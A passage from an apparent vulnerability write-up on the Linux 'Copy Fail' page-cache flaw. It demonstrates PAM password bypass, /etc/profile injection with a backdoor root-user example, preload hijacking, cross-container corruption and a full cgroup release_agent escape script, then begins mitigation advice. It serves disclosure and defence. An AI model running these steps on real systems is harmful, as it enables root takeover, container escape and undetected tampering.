5.2 PAM Authentication Bypass
pam_unix.so is the standard Linux password-authentication module and is usually 0644.
The idea is to modify the password-check path in pam_sm_authenticate: replace mov %eax,%ebp (89 c5), which saves the real return value, with xor %ebp,%ebp (31 ed), forcing the function to return PAM_SUCCESS (0):
; after password verification, save the return value
0x3d5e: 89 c5 mov %eax, %ebp ; original: save real verification result
; patched to:
0x3d5e: 31 ed xor %ebp, %ebp ; tampered: clear to zero = PAM_SUCCESS
python3 exp_pam_bypass.py
# [*] Auto-detected patch offset: 0x3d5e
# [*] Patching to: 31ede95e (xor %ebp,%ebp)
# [+] SUCCESS: pam_unix.so patched in page cache
su root
# Password: any input
# whoami -> root
Persistence detail. Processes such as sshd, login, and sd-pam load pam_unix.so through mmap(MAP_PRIVATE). These mappings keep references to the modified page, preventing drop_caches from evicting it. During invalidate_inode_page(), the kernel sees page_mapped() and skips eviction. The modification persists until all mapping processes exit or the file's inode is replaced, for example through yum reinstall pam.
5.3 Live-Patching Shared Libraries
Linux loads .so shared libraries through mmap(MAP_PRIVATE). Processes using the same library share the same physical page-cache pages. Modifying the page cache of a .so file is equivalent to modifying the code or data section seen by all running processes that have mapped that library. x86 cache coherence makes the write immediately visible to instruction and data fetches on all cores.
The experiment uses libnss_files.so, the system NSS name-resolution library, which is 0644, and a long-running monitor process:
# Step 1: start a monitor process that keeps reading a string from its mmap mapping.
gcc -o monitor exp_shared_lib_monitor.c -ldl
./monitor &
# [monitor] PID=161045
# [monitor] initial: "/etc/hosts"
# [monitor] tick 1: no change
# [monitor] tick 2: no change
# Step 2: tamper with the .so page cache from another terminal.
python3 exp_shared_lib.py
# [+] SUCCESS: '/etc/hosts' -> '/etc/h0sts' in page cache
# Step 3: the monitor sees the change without restart.
# [monitor] tick 3: *** STRING CHANGED ***
# [monitor] now: "/etc/h0sts"
# [monitor] *** LIVE-PATCH CONFIRMED (no restart) ***
The key evidence is that monitor process PID 161045 never restarts. It reads the original value during ticks 1 and 2, then immediately sees the modified string at tick 3 after the PoC runs.
On CentOS 8, more than twenty system daemons, including sshd, crond, dockerd, and dbus-daemon, hold mmap references to libnss_files.so. drop_caches cannot evict the modified page. The modification remains semi-persistent while the system is running, and recovery requires replacing the file, for example with yum reinstall glibc-common.
Risk note
Modifying the code section of core system libraries such as
libc.socan theoretically lead to arbitrary code execution in root daemons that call the modified function, but it carries a high risk of crashing the system. The experiment above only modified a string in the.rodatasection as a safer validation.
5.4 /etc/profile Command Injection
/etc/profile is 0644 on Linux distributions and is automatically sourced by every login shell, including SSH login, su -, and console login.
The idea is to use an existing comment line as cover. The injected command overwrites part of the comment, and the remaining original text is commented out by #, leaving the rest of the file functional:
# Original: # It's NOT a good idea to change this file unless you know what you
# Injected: id>>/tmp/CF-PWNED #ea to change this file unless you know what you
# command part '#' comments out the remaining text
python3 exp_profile_inject.py "id>>/tmp/CF-PWNED #"
# [*] Payload: 20 bytes, 5 writes
# [+] SUCCESS: command injected into /etc/profile
# Trigger: root starts a login shell.
su - root -c "echo triggered"
cat /tmp/CF-PWNED
# uid=0(root) gid=0(root) groups=0(root)
Only five writes, twenty bytes total, are needed. This path is highly portable because every distribution has /etc/profile, and it usually contains comment lines. A real attack could inject a reverse shell or a backdoor-user creation command, for example useradd -o -u0 backdoor #.
5.5 Tampering Scheduled-Task Scripts
Cron jobs and systemd services often reference scripts or binaries that are world-readable. They are passive targets: after tampering, the attacker only waits for the daemon's next scheduled execution.
# Setup: a cron job runs /tmp/copyfail-lab/cron_target.sh every minute.
# Script content: echo "ORIGINAL $(date +%s)" >> cron.log
# Tamper with the script page cache.
python3 exp_cron_script.py /tmp/copyfail-lab/cron_target.sh
# [+] SUCCESS: script tampered in page cache ("ORIGINAL" -> "HIJACKED")
# Next cron trigger, within one minute:
tail /tmp/copyfail-lab/cron.log
# HIJACKED 1778309461 <- crond executed the tampered script
crond rereads the script file each time it triggers the job, so it naturally consumes the tampered page-cache data. The same applies to service scripts referenced by systemd.
Configuration files versus script files
Directly modifying cron configuration files in
/etc/cron.d/or systemd unit files in page cache is technically possible, but it is not practical in real attacks.cronieuses inotify to detect configuration changes, and page-cache modification does not trigger inotify.crondmust restart to read the change. Systemd unit-file changes also requiresystemctl daemon-reloador a service restart. A low-privilege attacker cannot normally force these daemon operations. Practical attack paths are limited to scripts or binaries already referenced by existing jobs.
5.6 /etc/ld.so.preload Path Hijack
Shared libraries listed in /etc/ld.so.preload are loaded by the dynamic linker before normal libraries for every newly started program. Modifying a listed path gives global code injection.
# Precondition: /etc/ld.so.preload already exists, for example for performance monitoring.
cat /etc/ld.so.preload
# /tmp/copyfail-lab/libmarker.so
python3 exp_preload_hijack.py
# [+] SUCCESS: preload path hijacked
# /tmp/copyfail-lab/libmarker.so -> /tmp/copyfail-lab/libevil00.so
ls /dev/null
# [preload] EVIL LIBRARY LOADED! <- malicious library loaded by every new process
# /dev/null
Precondition: /etc/ld.so.preload must already exist. Copy Fail cannot create new files; it can only modify the page cache of existing files. The file is absent by default, but it commonly appears in environments using jemalloc preloading, LD_PRELOAD security agents, or performance-monitoring tools.
6. Deep Dive into Container Scenarios
The previous section covered several host-side privilege-escalation paths. In containerized infrastructure, the threat goes further: Page Cache is global shared state that crosses container isolation boundaries. After disclosure, multiple security teams quickly examined container and Kubernetes environments. The results showed that PSS Restricted and RuntimeDefault do not block AF_ALG, production EKS clusters can reproduce the issue end to end, and a privileged DaemonSet that shares an image layer can be abused for Pod-to-Node escape. This section independently validates and extends those findings, focusing on practical exploitability boundaries.
All conclusions below were experimentally verified on a real Kubernetes cluster: k3s v1.32 with containerd v2.0.5, running CentOS Stream 8 with an unpatched 4.18.0-553 kernel.
Container experiment code
The Pod YAML files, PoC scripts, and validation tools are in the container experiment package. URL links have been removed from this blog version.
6.1 Image-Layer Sharing: Cross-Container Page-Cache Propagation
Container runtimes such as containerd and Docker use overlayfs to manage container filesystems. For the same base image, such as python:3.11-slim, the image layers are stored once on the host. All containers using that image have lower layers pointing to the same set of inodes.
This means that when container A reads /usr/bin/python3, the kernel creates a page-cache entry for that inode. When container B later reads the same file, it hits the exact same page-cache page.
One important boundary must be emphasized: Page Cache is global at kernel level, but its scope is one machine. Only containers on the same node can share overlayfs layers that point to the same inodes and therefore share page-cache pages. Containers on different nodes have independent page caches, even if they use the same image. This same-node condition is the fundamental prerequisite for all cross-container attack scenarios below.

Experiment: Cross-Container Page-Cache Sharing
Deploy the experiment and verify inode sharing:
# Deploy two Pods using the same base image.
kubectl create ns copyfail-lab
kubectl apply -f pod-cross-tenant.yaml
# Verify that both Pods share the same /etc/os-release inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /etc/os-release
# 208483846
kubectl exec -n copyfail-lab pod-victim-same -- stat -c '%i' /etc/os-release
# 208483846 <- same inode = shared page cache
Run the page-cache write inside the attacker Pod:
# Run the PoC in the attacker Pod.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /etc/os-release
# [*] Target: /etc/os-release
# [*] Before: 50524554
# [*] After: deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# Victim Pod using the same base image immediately sees the tampered bytes.
kubectl exec -n copyfail-lab pod-victim-same -- \
python3 -c "import os; print(os.pread(os.open('/etc/os-release',0),16,0).hex())"
# deadbeef54595f4e414d453d22446562
# [+] MARKER FOUND: page cache is SHARED with attacker pod!
# Control group using a different base image is unaffected.
kubectl exec -n copyfail-lab pod-victim-alpine -- head -c 16 /etc/os-release | xxd
# 00000000: 4e41 4d45 3d22 416c 7069 6e65 NAME="Alpine
Reading the corresponding file directly from the containerd snapshot directory on the host shows the same tampered data:
# Host reads the snapshot-layer file.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# drop_caches restores it.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
6.2 Zero-Privilege Cross-Tenant Attack

Based on the sharing mechanism above, we can validate a zero-privilege cross-tenant attack where attacker and victim run in completely separate namespaces:
# Create two isolated namespaces.
kubectl create ns copyfail-lab # attacker
kubectl create ns tenant-victim # victim
# Deploy the Pods. See pod-cross-tenant.yaml in the experiment package.
kubectl apply -f pod-cross-tenant.yaml
Prerequisite validation: confirm inode sharing
# Two Pods in different namespaces, same base image -> same inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /bin/cat
# 1420102
kubectl exec -n tenant-victim victim-app -- stat -c '%i' /bin/cat
# 1420102 <- same inode, even across namespaces
Attack execution
# Step 1: verify that the victim's /bin/cat is normal.
kubectl exec -n tenant-victim victim-app -- \
python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# 7f454c46020101000000000000000000 (normal ELF header)
# Step 2: attacker runs Copy Fail without any special privilege.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /bin/cat
# [*] Before: 7f454c46
# [*] After: deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# Step 3: victim immediately sees the effect.
kubectl exec -n tenant-victim victim-app -- \
python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# deadbeef020101000000000000000000
# ELF magic is corrupted.
# Step 4: victim service breaks.
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# exec /usr/bin/cat: exec format error <- binary cannot execute
# Step 5: restore from the host.
echo 3 > /proc/sys/vm/drop_caches
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# victim-app <- normal again
The key conclusion is that this attack requires no special capability, no hostPath mount, and no relaxed security context. The only prerequisites are an unpatched kernel and the ability to execute Python, or an equivalent C program, inside the container. The two Pods do not need network connectivity and do not need to know each other's IP address or name.
The experiment above corrupted a file used by a normal user Pod, so the impact is limited to cross-tenant denial of service. The natural next question is whether the same mechanism can be turned into a container escape: can a zero-privilege Pod obtain node-level control?
The answer depends on the target. From Section 6.1, page-cache tampering has two prerequisites: the attacker and the target container must be on the same node, and they must share at least one image layer. If the target container runs with privileged: true, then when a tampered binary executes inside it, the attacker's payload runs with full node-level privileges.
A DaemonSet is the natural candidate for satisfying both conditions. A DaemonSet runs one Pod replica on every node. No matter where the compromised Pod is scheduled, a DaemonSet instance is present on the same node. Kubernetes clusters often run privileged system DaemonSets such as kube-proxy, CNI plugins, and log collectors.
This likely explains why one public PoC selected kube-proxy as the target. In managed clusters such as ACK, EKS, and GKE, kube-proxy commonly runs as a privileged DaemonSet. That PoC tampers with the page cache of the ipset binary inside kube-proxy and waits for kube-proxy to execute it. To make the sharing deterministic, the attacker image is built with FROM registry.k8s.io/kube-proxy:v1.35.2, guaranteeing a shared image layer that contains ipset.
Finding Exploitable Targets: Layer-Sharing Analysis on a Node
Using FROM to match the target image makes the exploit deterministic. To evaluate exposure in a real environment, namely whether a normal business Pod naturally shares a layer with a privileged DaemonSet on the same node, analyze the node as follows:
# 1. List all privileged containers and their images on the node.
crictl ps -o json | jq -r '.containers[] | "\(.id) \(.image.image) \(.metadata.name)"'
# 2. Compare layer digests between the business Pod image and the target DaemonSet image.
MY_IMAGE="python:3.11-slim"
TARGET_IMAGE="registry.k8s.io/kube-proxy:v1.35.2"
crictl inspecti $MY_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/my_layers.txt
crictl inspecti $TARGET_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/target_layers.txt
comm -12 <(sort /tmp/my_layers.txt) <(sort /tmp/target_layers.txt)
# Any output means a shared layer exists.
# 3. Confirm whether the target file is actually shared by both containers.
# Run this inside both containers.
stat -c '%d:%i' /usr/sbin/ipset # device:inode
# Same output in both containers confirms page-cache sharing.
If the shared object is a base library such as ld-linux-x86-64.so.2 or libc.so.6, the theoretical attack surface is larger because every binary loads it. In practice, replacing a whole .so file requires overwriting every four-byte window and is slow. If any process loads the .so during partial overwrite, it can crash. Core libraries are depended on by many processes, so tampering with libc.so.6 is more likely to cause widespread container crashes than stable code execution.
Challenges in Real Attacks
The analysis above requires node-level visibility through crictl and direct access to containerd storage. In a real attack, an attacker usually obtains only a shell inside a normal Pod through RCE. They cannot directly see which containers run on the same node, which images they use, or whether layer digests match. This means the attacker cannot complete the analysis in the target environment and must rely on inference or blind attempts.
Blindly trying Copy Fail against files in the target environment is a poor strategy. Each four-byte overwrite is irreversible unless an administrator drops the cache. If the guessed target file or layer-sharing relation is wrong, the attacker only corrupts a binary inside the compromised container. That may expose the intrusion or crash the container and lose the foothold.
A more realistic exploitation model is targeted exploitation against a known business environment. Once the attacker compromises a container, the application itself reveals the framework, middleware, base-image family, and version. The attacker can reproduce a similar environment locally with the same image and Kubernetes distribution, perform white-box analysis, identify privileged containers, confirm layer sharing, locate an exploitable shared file, and debug the payload. They then return to the target environment with a deterministic one-shot exploit.
6.3 Can It Escape Directly to the Host?
The previous section discussed cross-container escalation: tampering with a binary used by a privileged DaemonSet to indirectly obtain node privileges. That depends on shared layers and later execution inside the target container. A more aggressive question is whether we can skip the intermediate container entirely and make a host process execute tampered page-cache data directly.
Copy Fail can tamper with the page cache of any readable file, but data tampering alone is not enough. A host process must load and execute the tampered data in its own privilege context. A plain read() is not an escape. The read data must be used as code, for example through execve(), dlopen(), or an interpreter that jumps into parsed content.
First, however, we need to answer a simpler question: if a host process accesses a file whose page cache was tampered with, does it load original disk content or tampered page-cache content?
The answer is the latter. Page Cache is a global transparent cache for file I/O. Both read() and execve() load file content through the page cache, for example through filemap_read and readahead. If the page for an inode already exists in page cache, the kernel returns the cached data and does not reread disk. This behavior is independent of the namespace of the process accessing the file.
The experiment in Section 6.1 provides direct evidence. After tampering with /etc/os-release from inside a container:
# The host reads the same inode through the snapshot path and sees the tampered data.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# drop_caches forces eviction and the kernel reloads from disk.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
The before-and-after comparison shows that the host read page-cache content rather than disk content. The same applies to execve(). In the hostPath experiment in Section 6.4, after a container tampers with the page cache of /usr/bin/ls, the host's execution of ls returns exit 126 with exec format error. That proves execve() loaded the tampered ELF header from page cache.
Therefore, page-cache tampering is globally visible to the host and affects both read() and execve(). The real question is whether, in the standard container lifecycle, host processes actively access file inodes from container snapshot layers. There are two candidate scenarios:
- Whether the container runtime, such as containerd and runc, executes or
dlopen()s files from a container snapshot layer in the host context during container creation or startup. - Whether other host tools, such as EDR or compliance scanners, execute binaries, load
.sofiles, or interpret scripts from container layers.
For scenario 1, bpftrace was used to trace runc and containerd during container startup:
# Trace the mount namespace used by runc init when it reads files.
bpftrace -e '
kprobe:vfs_read /comm == "runc:[2:INIT]"/ {
$task = (struct task_struct *)curtask;
$mntns = $task->nsproxy->mnt_ns->ns.inum;
printf("runc-init vfs_read mntns=%u file=%s\n",
$mntns, str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' &
# Trigger container creation.
kubectl run test-probe --image=python:3.11-slim --restart=Never -- sleep 10
# Output:
# runc-init vfs_read mntns=4026533841 file=passwd
# runc-init vfs_read mntns=4026533841 file=group
# mntns is not the host namespace (4026531840), so runc is already inside the container namespace.
# Trace vfs_read in the containerd process.
bpftrace -e '
kprobe:vfs_read /comm == "containerd"/ {
printf("containerd vfs_read: %s\n",
str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' -- 60 # monitor for 60 seconds while creating and deleting containers
# Result: only config.json, meta.db, and similar metadata files appear.
# It never reads /bin/*, /etc/*, or other user files from snapshot layers.
The containerd trace confirms the same conclusion: it operates on metadata such as config.json and meta.db, and does not read or execute user files from snapshot layers.
Scenario 2 is environment-specific. Whether a host-side tool executes or loads files from container-layer paths depends on the software deployed on that node. It is not a universal condition and is not tested as a general escape path here, though such behavior could exist in specific environments.
Conclusion: in a standard Kubernetes environment using containerd, a generic zero-privilege container-to-host direct escape is architecturally infeasible. The runtime design ensures that runc's operations on the container rootfs occur after switching to the container mount namespace, while containerd does not touch user data inside snapshot layers. If a non-standard host service loads and executes files from container-layer paths, that can create an environment-specific escape vector. Docker has architectural differences and is discussed separately in Section 6.5.
6.4 Privileged Configurations and Container Escape
A zero-privilege direct escape is not practical, but if a container has certain privileged configurations, Copy Fail can become the missing final piece that turns read access into host-file tampering. The following cases were systematically verified.
hostPath readOnly plus Copy Fail: Bypassing Read-Only Restrictions
Kubernetes hostPath volumes are often configured with readOnly: true to prevent containers from modifying host files. Copy Fail bypasses that assumption through the page cache:
# Pod configuration. See pod-hostpath-escape.yaml in the experiment package.
volumes:
- name: host-bin
hostPath:
path: /usr/bin
type: Directory
volumeMounts:
- name: host-bin
mountPath: /hostbin
readOnly: true # looks safe
# Confirm the mount is read-only.
kubectl exec -n copyfail-lab hostpath-test -- mount | grep hostbin
# /dev/mapper/cl-root on /hostbin type xfs (ro,relatime,...)
# Normal write is denied.
kubectl exec -n copyfail-lab hostpath-test -- touch /hostbin/test
# touch: cannot touch '/hostbin/test': Read-only file system
# Copy Fail bypasses the read-only restriction.
kubectl exec -n copyfail-lab hostpath-test -- python3 /poc_marker.py /hostbin/ls
# [*] Before: 7f454c46
# [*] After: deadbeef
# [+] SUCCESS: page cache corrupted!
# Host verification.
ls
# bash: /usr/bin/ls: cannot execute binary file: Exec format error
# Exit code: 126
This is the most distinctive value of Copy Fail: it turns an O_RDONLY file descriptor into a writable attack surface. The common assumption is that a read-only mount at least prevents file tampering. Copy Fail breaks that assumption.
CAP_DAC_READ_SEARCH plus Copy Fail: Upgraded Shocker
CAP_DAC_READ_SEARCH allows a process to bypass file and directory read-permission checks. The classic Shocker attack uses open_by_handle_at() with this capability to obtain file descriptors for the host filesystem. Original Shocker only allowed reading host files.
With Copy Fail, the chain becomes:
# Deploy a container with CAP_DAC_READ_SEARCH.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: shocker-test
namespace: copyfail-lab
spec:
containers:
- name: test
image: python:3.11-slim
command: ["sleep", "infinity"]
securityContext:
capabilities:
add: ["DAC_READ_SEARCH"]
EOF
Attack process, executed inside the container:
kubectl exec -n copyfail-lab shocker-test -- python3 -c "
import os, struct, ctypes
# 1. Shocker: use open_by_handle_at() to obtain a host-root fd.
libc = ctypes.CDLL('libc.so.6', use_errno=True)
# ... construct root inode handle and call open_by_handle_at
# 2. Use openat() to open host /usr/bin/cat. Read-only is enough.
# 3. Use Copy Fail to tamper with the page cache.
"
# Experiment output:
# [1] Host root fd: 4
# [+] Host / contents: ['.autorelabel', 'bin', 'boot', 'dev', 'etc', ...]
# [2] Host /usr/bin/cat fd: 7
# [3] Before: 7f454c46020101000000000000000000
# [4] After: deadbeef020101000000000000000000
# [+] SUCCESS: Host /usr/bin/cat corrupted via Shocker + Copy Fail!
CAP_SYS_ADMIN plus Copy Fail: cgroup release_agent Escape
# Deploy a container with CAP_SYS_ADMIN.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: sysadmin-test
namespace: copyfail-lab
spec:
containers:
- name: test
image: python:3.11-slim
command: ["sleep", "infinity"]
securityContext:
capabilities:
add: ["SYS_ADMIN"]
EOF
Use cgroup v1 release_agent inside the container:
kubectl exec -n copyfail-lab sysadmin-test -- bash -c '
# Mount a cgroup subsystem.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
# Confirm release_agent is writable.
echo 1 > /tmp/cgrp/x/notify_on_release
# Set release_agent to a script path in the container upperdir.
host_path=$(sed -n "s/.*upperdir=\([^,]*\).*/\1/p" /proc/self/mountinfo)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Write the escape command.
echo "#!/bin/sh" > /cmd
echo "id > /tmp/cgrp/output; hostname >> /tmp/cgrp/output" >> /cmd
chmod +x /cmd
# Trigger.
echo $$ > /tmp/cgrp/x/cgroup.procs
sleep 1 && echo 0 > /tmp/cgrp/x/cgroup.procs
sleep 1 && cat /tmp/cgrp/output
'
# uid=0(root) gid=0(root) groups=0(root)
# your-hostname
# The host executed the command as root.
hostPID plus CAP_SYS_PTRACE plus Copy Fail
When a container shares the host PID namespace and has CAP_SYS_PTRACE, it can access the host filesystem root through /proc/1/root/. Combined with Copy Fail's page-cache write, this can tamper with host files.
# Obtain a host-file fd through /proc/1/root/ and use Copy Fail to tamper with it.
kubectl exec -n copyfail-lab hostpid-test -- python3 -c "
import os
fd = os.open('/proc/1/root/usr/bin/cat', os.O_RDONLY)
# ... page_cache_write_4bytes(fd, 0, b'\xde\xad\xbe\xef')
"
Summary
| Privileged configuration | Escape by itself | With Copy Fail |
|---|---|---|
| hostPath readOnly | No, read-only | Yes, bypass read-only and tamper with host files |
CAP_DAC_READ_SEARCH |
No, read-only | Yes, Shocker read becomes read/write |
CAP_SYS_ADMIN |
Yes, known path | Yes, cgroup release_agent |
hostPID plus SYS_PTRACE |
Yes, known path | Yes, tamper through /proc/1/root/ |
| hostPID alone | No | No |
SYS_PTRACE alone |
No | No |
NET_ADMIN, hostNetwork, hostIPC |
No | No |
6.5 Docker Environment
The previous analysis focused on Kubernetes with containerd. Docker shares the same underlying mechanisms: overlayfs layer sharing and global page-cache behavior. Therefore, cross-container page-cache sharing, read-only volume bypass with -v path:ro, and Shocker upgrade with --cap-add DAC_READ_SEARCH also work in Docker. I verified this on Docker 26.1.3 with overlay2 on XFS. The reproduction is essentially the same: replace kubectl exec with docker exec, and replace readOnly: true with -v path:ro.
This section focuses on Docker-specific architectural differences.
dockerd Architectural Difference
Section 6.3 showed that containerd in a Kubernetes environment only traverses metadata and does not read file data from snapshot layers. Docker's dockerd is different. As a monolithic daemon, management APIs such as docker export, docker commit, and docker cp read full file content from the container overlay filesystem with host privileges. If the page cache is already tampered with, these operations read the tampered bytes.
This behavior is not unique to Copy Fail. If a container directly writes a file, docker commit or docker export will also include the change. The unique value of Copy Fail appears in the next section: stealth.
docker export versus docker commit: Persistence Difference
The two operations treat Copy Fail tampering very differently.
docker export: persistent. It flattens the entire container filesystem into a tar archive and reads file contents one by one. Tampered page-cache bytes written into the tar become permanent and no longer depend on the page-cache lifecycle:
docker run -d --name copyfail-test python:3.11-slim sleep infinity
docker cp poc_marker.py copyfail-test:/poc_marker.py
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# Export while page cache is tampered; the tar records the tampered data.
docker export copyfail-test > tainted.tar
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# Export again after drop_caches; the new tar has original data.
echo 3 > /proc/sys/vm/drop_caches
docker export copyfail-test > clean.tar
tar xf clean.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
# Key point: the first tar remains permanently tainted even after page cache is cleared.
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
If this tar is used with docker import to build a new image or is distributed to another environment, the tampering becomes a supply-chain artifact.
docker commit: not persistent. It creates a new image layer but only records upper-layer changes. Lower layers are shared by reference; their file data is not copied into the new layer. Therefore, lower-layer files in the committed image are still read dynamically from page cache or disk:
# Tamper with page cache again.
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# Commit and start a container from the new image; it sees tampered data from page cache.
docker commit copyfail-test copyfail-committed:test
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# After drop_caches, it sees original data reloaded from disk.
echo 3 > /proc/sys/vm/drop_caches
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
Stealth: Blind Spots in Layered Detection
The previous section showed that docker export can persist tampered data, but directly writing a file inside the container and exporting it can do the same. Copy Fail's unique value is that tampering happens in the page cache of the lower layer and does not trigger overlayfs Copy-on-Write, so Docker's layered detection mechanisms fail.
1. Invisible to docker diff
docker diff copyfail-test
# A /poc_marker.py <- only upper-layer additions
# C /usr/local/lib/... <- Python cache files
# /usr/lib/os-release does not appear
docker diff only checks upper-layer changes. A direct file write triggers CoW into the upper layer and is immediately visible. Copy Fail modifies page cache only, so docker diff sees nothing.
2. The overlay2 layer path is also "polluted"
LAYER=$(docker inspect copyfail-test --format '{{.GraphDriver.Data.LowerDir}}' \
| tr ':' '\n' | xargs -I{} sh -c 'test -f {}/usr/lib/os-release && echo {}' | head -1)
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# deadbeef54595f4e414d453d22446562 <- host read of layer path returns page-cache data
echo 3 > /proc/sys/vm/drop_caches
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# 5052455454595f4e414d453d22446562 <- original data appears only after drop_caches
The layer-path file and the file inside the container share the same inode, and both go through the page cache. Any host-side tool that reads through the kernel filesystem path, such as sha256sum, cat, or a file-integrity scanner, reads the tampered data while the page cache is poisoned. It cannot distinguish real disk content from tampered page-cache content.
3. Image layer digest is unchanged
The compressed image-layer blobs listed in docker image inspect under RootFS.Layers are unaffected. They are independent tar.gz files and are different inodes from the files extracted under overlay2. Image scanners such as Trivy or Snyk usually analyze these layer blobs, so scanning the original image does not detect Copy Fail tampering.
Comparison
| Dimension | Copy Fail tampering | Direct file modification |
|---|---|---|
Visible to docker diff |
No, lower-layer page cache only | Yes, upper-layer CoW |
Persisted by docker export |
Yes, tampered bytes are written to tar | Yes |
Persisted by docker commit |
No, only valid while page cache is poisoned | Yes, written to upper layer |
| Image layer digest | Unchanged | New layer has a new digest |
| Image scanning of layer blobs | Not detected | Detectable if the changed layer is scanned |
| Page-cache lifecycle | Volatile; cleared by reboot or drop_caches | Not applicable; written to disk |
The value of Copy Fail in this scenario is not that it can do something direct writes cannot do. Its value is what it can do without being noticed: no docker diff entry, unchanged layer digest, no image-scanner finding, while docker export can still persist and distribute the tampered bytes.
7. Mitigation
The fundamental fix for Copy Fail is to upgrade the kernel (Section 7.1). If immediate upgrade is not possible, disable the vulnerable module as a temporary mitigation (Section 7.2). For container environments, additionally deploy a seccomp policy that blocks AF_ALG socket creation (Section 7.3).
Older Docker default seccomp profiles, Kubernetes RuntimeDefault, SELinux targeted policy, and sysctl settings do not mitigate this vulnerability. SELinux can block AF_ALG system-wide through a custom policy module that denies the alg_socket class, and that works for bare metal, VMs, and containers. However, it requires rules for each SELinux domain and is more complex to deploy and maintain than seccomp or module disabling.
7.1 Fundamental Fix: Upgrade the Kernel
The only complete fix is to upgrade to a kernel that includes patch a664bf3d603d. As of May 2026, the status of major distributions is summarized below:
| Distribution | Status | Fix or mitigation | Reference label |
|---|---|---|---|
| Ubuntu 18.04-25.10 | Mitigation released | kmod update disables algif_aead; kernel patch pending |
Ubuntu Blog |
| Ubuntu 26.04 (Resolute) | Not affected | Already includes the fix | Ubuntu Blog |
| RHEL 9 | Kernel fix released | RHSA-2026:13565, 2026-05-04 | RHSB-2026-02 |
| RHEL 10 | Kernel fix released | RHSA-2026:13566, 2026-05-04 | RHSB-2026-02 |
| RHEL 8 | Kernel fix released | RHSA-2026:13681 for 8.8, 2026-05-05; RHSA-2026:14230 for 8.6, 2026-05-06 | RHSB-2026-02 |
| Fedora 43 | Fixed | kernel 6.19.12 | Fedora Discussion |
| Debian 11/12/13 | Kernel fix released | DSA-6238-1, DSA-6243-1 | Debian Tracker |
| Alpine Linux | Fixed | Docker 29.4.2-r0 in edge; kernel packages fixed | Alpine Security |
| Oracle Linux 7/8/9/10 | Kernel fix released | ELSA-2026-50253/50254/50255, including UEK | Oracle CVE |
| AlmaLinux / Rocky | Kernel fix released | ALSA-2026:A001 for 8, ALSA-2026:A002 for 9 | AlmaLinux Blog |
| CentOS 8 Stream | Live patch available | KernelCare live patch | CloudLinux |
| SUSE / openSUSE | Patch released | SUSE-SU-2026:1671, 2026-05-02 | SUSE Response |
| Amazon Linux 2023 | Patch released | Kernel security update | AWS Bulletin |
| Bottlerocket | Patch released | OS update | Bottlerocket issue #4821 |
| Arch Linux | Fixed | Rolling update, kernel >= 6.19.12 | Arch Security |
Affected kernel version ranges
The affected ranges reported by the Alpine Security Tracker are:
- 4.14 <= kernel < 5.10.254
- 5.11 <= kernel < 5.15.204
- 5.16 <= kernel < 6.1.170
- 6.2 <= kernel < 6.6.137
- 6.7 <= kernel < 6.12.85
- 6.13 <= kernel < 6.18.22
- 6.19 <= kernel < 6.19.12
Check whether the current system is affected:
# 1. Check whether the kernel version is in an affected range.
uname -r
# 2. Check whether algif_aead is loadable or built in.
# Output means loadable module; no output usually means built-in or absent.
modinfo algif_aead 2>/dev/null && echo "==> LOADABLE module" || echo "==> BUILT-IN or not present"
# 3. Check whether mitigations are already present.
# Debian/Ubuntu: kmod mitigation.
grep -r algif_aead /etc/modprobe.d/ 2>/dev/null
# RHEL/CentOS: initcall_blacklist.
cat /proc/cmdline | grep -o 'initcall_blacklist=[^ ]*'
Distribution update commands:
# Debian/Ubuntu:
sudo apt update && sudo apt upgrade
# Alpine:
apk update && apk upgrade
# Arch:
pacman -Syu
# SUSE:
zypper update
# RHEL/CentOS:
